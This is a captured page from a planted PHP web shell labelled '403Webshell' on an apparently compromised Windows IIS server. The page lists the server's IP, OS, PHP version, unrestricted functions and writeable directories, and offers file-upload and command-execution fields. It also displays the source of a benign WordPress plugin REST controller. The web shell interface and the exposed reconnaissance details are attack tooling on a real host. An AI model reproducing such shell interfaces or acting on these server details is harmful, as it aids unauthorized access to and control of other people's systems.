403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/ict/wp-content/plugins/the-post-grid/app/Controllers/Api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/ict/wp-content/plugins/the-post-grid/app/Controllers/Api/ImageSizeV1.php
<?php

namespace RT\ThePostGrid\Controllers\Api;

use RT\ThePostGrid\Helpers\Fns;

class ImageSizeV1{
	public function __construct(){
		add_action("rest_api_init", [$this, 'register_image_size_route']);
	}

	public function register_image_size_route(){
		register_rest_route( 'rttpg/v1', 'image-size',array(
			'methods'  => 'GET',
			'callback' => [$this, 'get_image_sizes'],
			'permission_callback' => function() { return true; }
		));
	}

	public function get_image_sizes(){
		$data = Fns::get_all_image_sizes_guten();
		return rest_ensure_response($data);
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit